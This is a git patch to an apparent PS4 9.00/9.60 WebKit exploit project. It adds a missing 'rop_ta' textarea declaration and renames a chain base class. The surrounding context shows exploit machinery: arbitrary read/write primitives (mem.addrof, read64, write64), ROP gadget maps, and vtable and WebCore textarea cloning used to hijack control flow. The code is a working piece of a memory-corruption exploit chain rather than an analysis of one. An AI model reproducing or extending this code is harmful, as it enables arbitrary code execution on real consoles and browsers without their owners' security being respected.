From 8d4cdff0f2d8fbfad02ad01ff0dec637f4a9c9ac Mon Sep 17 00:00:00 2001 From: Kameleon <77245601+kmeps4@users.noreply.github.com> Date: Sat, 27 Jan 2024 21:38:19 -0600 Subject: [PATCH] adding rop_ta missing declaration --- rop/900.mjs | 6 ++++-- rop/960.mjs | 9 ++++++--- 2 files changed, 10 insertions(+), 5 deletions(-) diff --git a/rop/900.mjs b/rop/900.mjs index e41c32a..49cc8da 100644 --- a/rop/900.mjs +++ b/rop/900.mjs @@ -220,6 +220,9 @@ function init_gadget_map(gadget_map, offset_map, base_addr) { } } +// helper object for ROP +const rop_ta = document.createElement('textarea'); + class Chain900Base extends ChainBase { constructor() { super(); @@ -482,10 +485,9 @@ class Chain900 extends Chain900Base { // that we think is large enough for all of them. const vtable_size = 0x1000; const webcore_ta_size = 0x180; - const rop_ta = {}; + const ta_clone = {}; this.ta_clone = ta_clone; - this.rop_ta = rop_ta; const clone_p = mem.addrof(ta_clone); const ta_p = mem.addrof(rop_ta); diff --git a/rop/960.mjs b/rop/960.mjs index a9e70b8..0b149cc 100644 --- a/rop/960.mjs +++ b/rop/960.mjs @@ -219,7 +219,10 @@ function init_gadget_map(gadget_map, offset_map, base_addr) { } } -class Chain950Base extends ChainBase { +// helper object for ROP +const rop_ta = document.createElement('textarea'); + +class Chain960Base extends ChainBase { constructor() { super(); @@ -467,7 +470,7 @@ class Chain950Base extends ChainBase { } // Chain for PS4 9.60 -class Chain950 extends Chain950Base { +class Chain950 extends Chain960Base { constructor() { super(); @@ -485,7 +488,7 @@ class Chain950 extends Chain950Base { const ta_clone = {}; this.ta_clone = ta_clone; const clone_p = mem.addrof(ta_clone); - //const ta_p = mem.addrof(rop_ta); + const ta_p = mem.addrof(rop_ta); for (let i = js_size; i < js_ta_size; i += 8) { clone_p.write64(i, ta_p.read64(i));